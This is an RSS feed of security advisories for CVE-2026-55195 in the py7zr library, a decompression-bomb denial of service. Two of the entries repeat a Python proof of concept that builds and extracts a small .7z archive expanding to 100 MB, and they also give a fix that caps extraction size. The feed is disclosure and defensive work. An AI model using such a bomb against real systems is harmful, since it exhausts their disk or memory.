<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Mon, 05 Oct 2026 21:12:23 +0000</lastBuildDate>
    <item>
      <title>BREW-aqtinstall-CVE-2026-55195 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
      <link>https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55195</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: aqtinstall&lt;/p&gt;
&lt;p&gt;py7zr&amp;#39;s `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.&lt;/p&gt;
&lt;p&gt;Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).&lt;/p&gt;
&lt;p&gt;**Proof of concept:**&lt;/p&gt;
&lt;p&gt;```python
import py7zr, tempfile, os&lt;/p&gt;
&lt;p&gt;# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix=&amp;#39;.7z&amp;#39;)
with py7zr.SevenZipFile(bomb_path, &amp;#39;w&amp;#39;) as z:
    import io
    z.writef(io.BytesIO(b&amp;#39;\x00&amp;#39; * 100 * 1024 * 1024), &amp;#39;bomb.bin&amp;#39;)&lt;/p&gt;
&lt;p&gt;print(f&amp;#39;archive size: {os.path.getsize(bomb_path):,} bytes&amp;#39;)&lt;/p&gt;
&lt;p&gt;# extract — no size check
with py7zr.SevenZipFile(bomb_path, &amp;#39;r&amp;#39;) as z:
    z.extractall(path=tempfile.mkdtemp())&lt;/p&gt;
&lt;p&gt;print(&amp;#39;extracted 100 MB from ~15 KB archive&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python&amp;#39;s `zipfile` `max_size` parameter.&lt;/p&gt;
&lt;p&gt;**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:&lt;/p&gt;
&lt;p&gt;```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable&lt;/p&gt;
&lt;p&gt;total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &amp;gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f&amp;#39;Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes&amp;#39;
        )
    outfile.write(chunk)
```&lt;/p&gt;
&lt;p&gt;Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Homebrew: aqtinstall&lt;/p&gt;
&lt;p&gt;py7zr&amp;#39;s `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.&lt;/p&gt;
&lt;p&gt;Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).&lt;/p&gt;
&lt;p&gt;**Proof of concept:**&lt;/p&gt;
&lt;p&gt;```python
import py7zr, tempfile, os&lt;/p&gt;
&lt;p&gt;# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix=&amp;#39;.7z&amp;#39;)
with py7zr.SevenZipFile(bomb_path, &amp;#39;w&amp;#39;) as z:
    import io
    z.writef(io.BytesIO(b&amp;#39;\x00&amp;#39; * 100 * 1024 * 1024), &amp;#39;bomb.bin&amp;#39;)&lt;/p&gt;
&lt;p&gt;print(f&amp;#39;archive size: {os.path.getsize(bomb_path):,} bytes&amp;#39;)&lt;/p&gt;
&lt;p&gt;# extract — no size check
with py7zr.SevenZipFile(bomb_path, &amp;#39;r&amp;#39;) as z:
    z.extractall(path=tempfile.mkdtemp())&lt;/p&gt;
&lt;p&gt;print(&amp;#39;extracted 100 MB from ~15 KB archive&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python&amp;#39;s `zipfile` `max_size` parameter.&lt;/p&gt;
&lt;p&gt;**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:&lt;/p&gt;
&lt;p&gt;```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable&lt;/p&gt;
&lt;p&gt;total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &amp;gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f&amp;#39;Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes&amp;#39;
        )
    outfile.write(chunk)
```&lt;/p&gt;
&lt;p&gt;Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55195</guid>
    </item>
    <item>
      <title>CVE-2026-55195 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2026-55195</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; miurahr py7zr&lt;/p&gt;
&lt;p&gt;py7zr is a Python-based library and utility to support 7zip archive compression, decompression, encryption and decryption. Prior to 1.1.3, py7zr&amp;#39;s Worker.decompress() extracted archive entries without tracking total decompressed size, allowing a crafted .7z file such as a 15.6 KB archive that expands to 100 MB to exhaust disk or memory before extraction completes. This issue is fixed in version 1.1.3.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; miurahr py7zr&lt;/p&gt;
&lt;p&gt;py7zr is a Python-based library and utility to support 7zip archive compression, decompression, encryption and decryption. Prior to 1.1.3, py7zr&amp;#39;s Worker.decompress() extracted archive entries without tracking total decompressed size, allowing a crafted .7z file such as a 15.6 KB archive that expands to 100 MB to exhaust disk or memory before extraction completes. This issue is fixed in version 1.1.3.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2026-55195</guid>
    </item>
    <item>
      <title>GHSA-gjrg-mpp7-g774 — py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-gjrg-mpp7-g774</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: py7zr&lt;/p&gt;
&lt;p&gt;py7zr&amp;#39;s `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.&lt;/p&gt;
&lt;p&gt;Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).&lt;/p&gt;
&lt;p&gt;**Proof of concept:**&lt;/p&gt;
&lt;p&gt;```python
import py7zr, tempfile, os&lt;/p&gt;
&lt;p&gt;# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix=&amp;#39;.7z&amp;#39;)
with py7zr.SevenZipFile(bomb_path, &amp;#39;w&amp;#39;) as z:
    import io
    z.writef(io.BytesIO(b&amp;#39;\x00&amp;#39; * 100 * 1024 * 1024), &amp;#39;bomb.bin&amp;#39;)&lt;/p&gt;
&lt;p&gt;print(f&amp;#39;archive size: {os.path.getsize(bomb_path):,} bytes&amp;#39;)&lt;/p&gt;
&lt;p&gt;# extract — no size check
with py7zr.SevenZipFile(bomb_path, &amp;#39;r&amp;#39;) as z:
    z.extractall(path=tempfile.mkdtemp())&lt;/p&gt;
&lt;p&gt;print(&amp;#39;extracted 100 MB from ~15 KB archive&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python&amp;#39;s `zipfile` `max_size` parameter.&lt;/p&gt;
&lt;p&gt;**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:&lt;/p&gt;
&lt;p&gt;```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable&lt;/p&gt;
&lt;p&gt;total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &amp;gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f&amp;#39;Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes&amp;#39;
        )
    outfile.write(chunk)
```&lt;/p&gt;
&lt;p&gt;Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: py7zr&lt;/p&gt;
&lt;p&gt;py7zr&amp;#39;s `Worker.decompress()` extracts archive entries without tracking total decompressed size. A crafted `.7z` file can exhaust disk or memory before the extraction completes.&lt;/p&gt;
&lt;p&gt;Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).&lt;/p&gt;
&lt;p&gt;**Proof of concept:**&lt;/p&gt;
&lt;p&gt;```python
import py7zr, tempfile, os&lt;/p&gt;
&lt;p&gt;# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix=&amp;#39;.7z&amp;#39;)
with py7zr.SevenZipFile(bomb_path, &amp;#39;w&amp;#39;) as z:
    import io
    z.writef(io.BytesIO(b&amp;#39;\x00&amp;#39; * 100 * 1024 * 1024), &amp;#39;bomb.bin&amp;#39;)&lt;/p&gt;
&lt;p&gt;print(f&amp;#39;archive size: {os.path.getsize(bomb_path):,} bytes&amp;#39;)&lt;/p&gt;
&lt;p&gt;# extract — no size check
with py7zr.SevenZipFile(bomb_path, &amp;#39;r&amp;#39;) as z:
    z.extractall(path=tempfile.mkdtemp())&lt;/p&gt;
&lt;p&gt;print(&amp;#39;extracted 100 MB from ~15 KB archive&amp;#39;)
```&lt;/p&gt;
&lt;p&gt;**Root cause:** `Worker.decompress()` in `py7zr/worker.py` writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python&amp;#39;s `zipfile` `max_size` parameter.&lt;/p&gt;
&lt;p&gt;**Fix:** track cumulative decompressed bytes and raise before writing if a limit is exceeded:&lt;/p&gt;
&lt;p&gt;```python
MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable&lt;/p&gt;
&lt;p&gt;total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total &amp;gt; MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f&amp;#39;Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes&amp;#39;
        )
    outfile.write(chunk)
```&lt;/p&gt;
&lt;p&gt;Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-gjrg-mpp7-g774</guid>
    </item>
  </channel>
</rss>
